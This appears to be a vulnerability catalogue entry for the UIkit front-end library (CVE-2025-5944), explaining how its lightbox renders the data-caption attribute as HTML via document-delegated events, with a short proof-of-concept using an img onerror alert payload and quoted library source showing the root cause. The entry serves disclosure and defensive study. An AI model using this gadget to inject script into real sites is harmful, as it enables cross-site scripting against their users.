.. / uikit
Star Fork

A lightweight and modular front-end framework for developing fast and powerful web interfaces.

≥2.18.0 | CVE-2025-5944

The uikit library uses the data-caption attribute to inject HTML content. Because the event that triggers this behavior is delegated from the document, it can be activated at any time. (This also applies to elements using the uk-lightbox attribute directly)
```
<script src="https://cdnjs.cloudflare.com/ajax/libs/uikit/3.23.11/js/uikit.min.js"></script>


<x data-uk-lightbox>
  <a data-caption="<img src=x onerror=alert(document.domain);>">Click Me</a>
</x>
```

More information

Root Cause

Source: https://github.com/uikit/uikit/blob/0d7a36576ccb0aec048b3c4ed62eca4ebee9aab0/src/js/util/event.js#L87

function delegate(selector, listener) {
    return (e) => {
        const current =
            selector[0] === '>'
                ? findAll(selector, e.currentTarget)
                      .reverse()
                      .find((element) => element.contains(e.target))
                : e.target.closest(selector);

        if (current) {
            e.current = current;
            listener.call(this, e);
            delete e.current;
        }
    };
}

Source: https://github.com/uikit/uikit/blob/0d7a36576ccb0aec048b3c4ed62eca4ebee9aab0/src/js/components/lightbox-panel.js#L237

handler(e) {
    html($(this.selCaption, this.$el), this.getItem().caption || '');
    html(
        $(this.selCounter, this.$el),
        this.t('counter', this.index + 1, this.slides.length),
    );

    for (let j = -this.preload; j <= this.preload; j++) {
        this.loadItem(this.index + j);
    }

    if (this.isToggled()) {
        return;
    }

    this.draggable = false;

    e.preventDefault();

    this.toggleElement(this.$el, true, false);

    this.animation = Animations.scale;
    removeClass(e.target, this.clsActive);
    this.stack.splice(1, 0, this.index);
},

.. / uikit Star Fork

≥2.18.0 | CVE-2025-5944

.. / uikit
Star Fork